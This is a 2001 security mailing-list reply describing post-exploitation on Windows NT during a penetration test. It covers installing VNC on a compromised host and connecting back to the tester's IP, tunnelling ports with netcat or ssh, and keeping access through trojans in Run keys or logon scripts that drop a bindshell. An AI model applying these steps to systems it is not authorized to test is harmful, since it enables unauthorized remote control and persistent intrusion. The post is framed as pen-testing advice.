Re: Problems on the DOS-Prompt

[H D Moore <hdm () secureaustin com>]

On Sunday 16 September 2001 04:18 pm, Rainer Duffner wrote:
> Hi,
[ snip ]
> Even with hk.exe, NET USE fails. Is there an explanation ?

One strategy for getting an interactive network session is to install VNC 
remotely and send yourself back a desktop.  The basic steps:

1. Get SYSTEM privs.

2. Copy winvnc.exe, vnchooks.dll, and omnithread_rt.dll to c:\winnt\system32

3. Use reg.exe, regini.exe, or regedit (NT 4.0 only) to load the default 
registry settings, including the password to use. You can create one of these 
by setting up VNC on a local machine and dumping the registry tree.

4. Run vncviewer -listen on a machine that the target box can reach on port 
5500.  For hardcore firewalled environments you can redirect ports with 
fpipe, netcat, or ssh -R/-L.

5. execute winvnc -install, then net start winvnc, and finally winvnc 
-connect <yourip>, type in your password and use the desktop.

6. If an Admin is logged on, the game is over, you have his/her privs.  If 
you get a logon prompt, go create a user account then login with it ;)


You can also add a trojan to the registry Run keys, the startup folder, or 
the network logon scripts. Idealy this trojan would drop a bindshell running 
in the context of the user.  

Also, please be sure to _remove_ any trojans or VNC services you install, 
theres no point in paying for a security assessment/pen-test if you are worse 
out then when you started.  If anyone needs help getting the VNC setup going, 
email me, if enough people ask I will put up a tutorial...

-- 
H D Moore
http://www.digitaldefense.net - work
http://www.digitaloffense.net - play

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/